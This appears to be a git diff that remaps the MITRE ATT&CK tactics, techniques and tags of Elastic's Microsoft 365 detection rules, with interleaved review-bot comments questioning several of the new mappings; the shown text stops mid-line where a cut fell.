--- a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml +++ b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,14 +80,13 @@ o365.audit.NewValue:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml index a83611522d5..9c9c726a77e 100644 --- a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml +++ b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,14 +78,13 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml index 1e70dfb7fd2..ea4d8372529 100644 --- a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml +++ b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,16 +52,7 @@ references = ["https://cloud.google.com/blog/topics/threat-intelligence/expansio risk_score = 21 rule_id = "4f2654e4-125b-11f1-af7d-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -101,35 +92,18 @@ web where event.dataset == "o365.audit" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1619"
-name = "Cloud Storage Object Discovery"
-reference = "https://attack.mitre.org/techniques/T1619/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1213"
 name = "Data from Information Repositories"
 reference = "https://attack.mitre.org/techniques/T1213/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1213.002"
 name = "Sharepoint"
 reference = "https://attack.mitre.org/techniques/T1213/002/"
-[[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
-
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
-
diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml
index cc943708bc7..d2d87fd2d44 100644
--- a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml
+++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,7 @@ references = [
 risk_score = 47
 rule_id = "ff4dd44a-0ac6-44c4-8609-3f81bc820f02"
 severity = "medium"
-tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
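Review bot: After this hunk the rule maps only to Collection (`T1213.002`) and the earlier tags hunk drops `Tactic: Discovery`, yet the file keeps its `discovery_` prefix; if this directory follows a tactic-prefixed naming convention, as the other filenames suggest, the name now points readers at the wrong tactic. The same drift appears elsewhere in this patch, for example `exfiltration_exchange_transport_rule_creation.toml` now mapped to Collection and `initial_access_identity_illicit_consent_grant_via_registered_application.toml` now mapped to Persistence. Renaming is noisy for downstream consumers, but either a follow-up rename or a sentence in the PR description stating that filenames are historical would save the next maintainer from "fixing" the mapping back. The `[rule]` table this hunk edits starts outside the hunk.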
@@ -78,14 +78,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" +[[rule.threat.technique.subtechnique]] +id = "T1114.003" +name = "Email Forwarding Rule" +reference = "https://attack.mitre.org/techniques/T1114/003/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml index ed1b40e8736..ef9c4fa2887 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,7 +68,7 @@ references = [ risk_score = 47 rule_id = "272a6484-2663-46db-a532-ef734bf9a796" severity = "medium" -tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -79,14 +79,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml
index 50995758898..34979e5bdcc 100644
--- a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml
+++ b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/24"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
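Review bot: The creation and modification rules for the same Exchange object now land in different tactics — the creation hunk earlier in this patch maps transport rule creation to `T1114.003` Email Forwarding Rule under Collection, while this hunk maps modification to `T1562.001` Disable or Modify Tools under Defense Evasion. A transport rule edit can add an external forward or BCC action just as easily as a new rule can be used to bypass mail filtering, so the observable does not determine the tactic, and the queries are outside both hunks so nothing visible distinguishes the two cases. Unless the queries differ, giving both rules both entries (`T1114.003` under `TA0009` and `T1562.001` under `TA0005`, the way the Global Administrator rule in this patch repeats `T1098.003` under two tactics) keeps the coverage honest. The `[rule]` table starts outside this hunk.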
@@ -79,15 +79,7 @@ references = [
 risk_score = 47
 rule_id = "0c3c80de-08c2-11f0-bd11-f661ea17fbcc"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: Microsoft 365",
- "Data Source: Microsoft 365 Audit Logs",
- "Use Case: Identity and Access Audit",
- "Resources: Investigation Guide",
- "Tactic: Initial Access",
- "Tactic: Credential Access",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -102,34 +94,16 @@ event.dataset: "o365.audit"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
-
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml
index f97a3f4fe2b..e4b0251791c 100644
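Review bot: Replacing `T1528` Steal Application Access Token and `T1566.002` with a lone `T1098` Account Manipulation entry under Persistence drops the credential-access reading of an illicit consent grant, even though ATT&CK describes consent phishing for OAuth application permissions under T1528 and the rule's own name still says "illicit consent grant". The consented application does gain durable delegated access, so Persistence is a reasonable addition, but as the only entry it under-reports what the attacker actually obtains. Consider keeping a second `[[rule.threat]]` block with `T1528` under `TA0006` Credential Access next to the new Persistence one, in which case the tags hunk above needs `Tactic: Credential Access` back. The `[rule]` table starts outside this hunk and `[rule.investigation_fields]` continues past it.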
--- a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ references = [ risk_score = 47 rule_id = "929d0766-204b-11f0-9c1f-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -141,29 +133,31 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml index bf11a1e50c2..6066dad1266 100644 --- a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml +++ b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] 
@@ -75,15 +75,7 @@ references = [
 risk_score = 47
 rule_id = "2de10e77-c144-4e69-afb7-344e7127abd0"
 severity = "medium"
-tags = [
- "Domain: Identity",
- "Data Source: Microsoft 365",
- "Data Source: Microsoft 365 Audit Logs",
- "Use Case: Identity and Access Audit",
- "Use Case: Threat Detection",
- "Tactic: Initial Access",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Identity", "Tactic: Credential Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -103,27 +95,21 @@ event.dataset:o365.audit
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
 [[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
+id = "T1606"
+name = "Forge Web Credentials"
+reference = "https://attack.mitre.org/techniques/T1606/"
+[[rule.threat.technique.subtechnique]]
+id = "T1606.002"
+name = "SAML Tokens"
+reference = "https://attack.mitre.org/techniques/T1606/002/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["o365.audit.UserId", "o365.audit.ErrorNumber"]
diff --git a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml
index f460f945f23..1515f163b1b 100644
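Review bot: Mapping a new-terms anomaly on `o365.audit.UserId` plus `o365.audit.ErrorNumber` to `T1606.002` Forge Web Credentials: SAML Tokens is hard to justify, because a forged SAML token that passes validation yields a successful sign-in rather than an error, so unusual error codes are at best weak evidence of it, and the query (outside this hunk) is not shown to tie the error numbers to token-validation failures. The previous `T1078.004` / `T1566` mapping under Initial Access was broad, but it matched what a burst of new error codes for a user usually reflects: credential guessing, MFA challenges or conditional-access blocks. If the intent is to catch failed token replay, say so in the rule description and consider `T1550.001` Application Access Token or `T1110` instead; otherwise restoring a Valid Accounts entry is the more defensible mapping. The `[rule]` table starts outside this hunk and `[rule.new_terms]` continues past it.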
--- a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml
+++ b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/12"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/02/04"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -74,24 +74,13 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.a
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.001"
-name = "Spearphishing Attachment"
-reference = "https://attack.mitre.org/techniques/T1566/001/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml
index 15f54581589..3caea118249 100644
--- a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml
+++ b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/07/15"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/02/04"
+updated_date = "2026/03/23"
 [rule]
 author = ["Austin Songer"]
@@ -77,11 +77,3 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c
 '''
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
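Review bot: Deleting the whole `[[rule.threat]]` block in the last hunk leaves the user-restricted-from-sending rule with no ATT&CK mapping at all, and since the `tags` line is not in the diff for this file it is not visible whether a `Tactic: Impact` tag was left behind to disagree with the now-empty mapping. A user being restricted by Security & Compliance is typically the tail end of outbound abuse from a compromised mailbox, so an entry such as `T1534` Internal Spearphishing under `TA0008` Lateral Movement, or `T1566` Phishing, would carry more information than none, provided it matches the rule's description (which is outside the hunk). If leaving it unmapped is deliberate, a short note in the description explaining why would stop the next maintainer from re-adding a tactic-only entry. The `[rule]` table starts outside this hunk.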
diff --git a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml index 29d2607f6cb..7f4d3ef8c88 100644 --- a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,30 +75,13 @@ event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1080" name = "Taint Shared Content" reference = "https://attack.mitre.org/techniques/T1080/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1608" -name = "Stage Capabilities" -reference = "https://attack.mitre.org/techniques/T1608/" -[[rule.threat.technique.subtechnique]] -id = "T1608.001" -name = "Upload Malware" -reference = "https://attack.mitre.org/techniques/T1608/001/" - - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" - diff --git a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml index 68a66be6744..8045ac1ec6b 100644 --- a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -74,30 +74,13 @@ event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePoint [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1080" name = "Taint Shared Content" reference = "https://attack.mitre.org/techniques/T1080/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1608" -name = "Stage Capabilities" -reference = "https://attack.mitre.org/techniques/T1608/" -[[rule.threat.technique.subtechnique]] -id = "T1608.001" -name = "Upload Malware" -reference = "https://attack.mitre.org/techniques/T1608/001/" - - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" - diff --git a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml index 1768e604eac..7320db56d55 100644 --- a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml +++ b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -59,16 +59,7 @@ references = [ risk_score = 47 rule_id = "88671231-6626-4e1b-abb7-6e361a171fbb" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Domain: Identity", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -87,19 +78,36 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml index 3618f364ed9..dc8eced2b23 100644 --- a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml +++ b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,13 +67,7 @@ references = [ risk_score = 47 rule_id = "98995807-5b09-4e37-8a54-5cae5dc932d7" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,18 +78,36 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml index 71b93df4cac..5432108c661 100644 
--- a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml +++ b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -73,16 +73,7 @@ references = [ risk_score = 21 rule_id = "0ce6487d-8069-4888-9ddd-61b52490cebc" severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft Exchange", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft Exchange", "Data Source: Microsoft 365 Audit Logs", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -116,22 +107,39 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.002" name = "Additional Email Delegate Permissions" reference = "https://attack.mitre.org/techniques/T1098/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.002" +name = "Additional Email Delegate Permissions" +reference = "https://attack.mitre.org/techniques/T1098/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId"] diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml index 6b821fb7bfe..c3a951755b8 100644 --- a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml +++ b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] 
@@ -64,13 +64,7 @@ references = [ risk_score = 21 rule_id = "684554fc-0777-47ce-8c9b-3d01f198d7f8" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,19 +77,46 @@ event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = 